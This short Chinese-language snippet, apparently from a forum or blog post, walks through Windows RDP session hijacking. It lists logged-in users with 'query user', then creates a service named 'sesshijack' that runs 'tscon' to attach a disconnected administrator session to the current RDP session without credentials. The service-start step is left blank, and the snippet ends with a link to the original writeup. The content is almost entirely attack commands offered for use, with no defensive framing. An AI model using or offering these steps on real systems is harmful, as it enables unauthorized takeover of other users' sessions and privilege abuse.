|
查看用户:
- C:\Windows\system32>query user
- USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
- administrator 1 Disc 1 3/12/2017 3:07 PM
- >localadmin rdp-tcp#55 2 Active . 3/12/2017 3:10 PM
- C:\Windows\system32>
复制代码 创建服务:
- C:\Windows\system32>sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
- [SC] CreateService SUCCESS
复制代码 启动服务:
细节:
http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
|
|